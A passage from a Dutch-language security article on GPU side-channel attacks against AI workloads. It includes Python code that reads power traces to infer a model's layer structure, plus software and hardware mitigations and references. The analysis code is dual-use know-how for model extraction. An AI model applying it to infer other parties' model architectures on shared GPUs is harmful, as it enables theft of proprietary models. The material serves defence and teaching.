            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }

Stroom- en elektromagnetische side-channels

GPU-stroomverbruik correleert met rekenkundige activiteit. Onderzoek heeft aangetoond dat stroomtraces het volgende kunnen onthullen:

Of de GPU matrixvermenigvuldiging uitvoert (training/inference) versus geheugenoperaties
De grootte van de matrices die worden berekend
Mogelijk de waarden die worden verwerkt (in extreme gevallen met hoge-resolutiemetingen)

Deze aanvallen vereisen fysieke toegang tot stroommeetpunten of elektromagnetische probes nabij de GPU, waardoor ze vooral relevant zijn voor:

Gedeelde fysieke infrastructuur (colocatie-datacenters)
Edge-AI-apparaten waar een aanvaller fysieke toegang heeft
Supply-chain-aanvallen waarbij monitoringhardware is geïmplanteerd

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        phases = []
        current_phase = "idle" if powers[0] < mean_power else "active"
        phase_start = 0
 
        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i
 
        active_phases = [p for p in phases if p["type"] == "active"]
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigaties

Softwarematige mitigaties

import torch
from typing import Optional
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """Securely deallocate a tensor by overwriting with zeros before freeing."""
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Prevents timing side channels by making all inferences take the same time.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output

Hardwarematige mitigaties

Mitigatie	Effectiviteit	Prestatie-impact	Beschikbaarheid
MIG (Multi-Instance GPU)	Hoog — hardware-isolatie	Vermindert reken per instance	A100, H100
NVIDIA Confidential Computing	Zeer hoog — versleuteld GPU-geheugen	5-15% overhead	H100
GPU-geheugenscrubbing	Gemiddeld — verwijdert residuen	Voegt toewijzingslatentie toe	Softwarematig configureerbaar
Aparte GPU per workload	Volledig — geen sharing	Duur	Elke GPU
IOMMU	Gemiddeld — voorkomt DMA-aanvallen	Minimaal	Afhankelijk van CPU/chipset

Defensieve aanbevelingen

Gebruik MIG voor multi-tenant GPU-omgevingen om hardware-afgedwongen geheugenisolatie te bereiken
Initialiseer GPU-geheugen op nul bij toewijzing om residu-datalekkage te voorkomen
Vul GPU-geheugen met nullen voordat je gevoelige tensors vrijgeeft
Gebruik NVIDIA Confidential Computing (H100) voor gevoelige inference-workloads
Vermijd GPU-time-slicing voor security-gevoelige workloads — gebruik dedicated GPU's of MIG-instances
Voeg timing-ruis toe aan inference-operaties om timing-side-channels te verslaan
Monitor GPU-stroomverbruik op afwijkende patronen die op een side-channelaanval kunnen wijzen
Schakel IOMMU in om DMA-gebaseerde geheugentoegang vanuit gecompromitteerde GPU-workloads te voorkomen

Referenties

Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)

GPU-geheugen side-channelaanvallen

Gerelateerde artikelen

GPU-geheugen side-channelaanvallen

Gerelateerde artikelen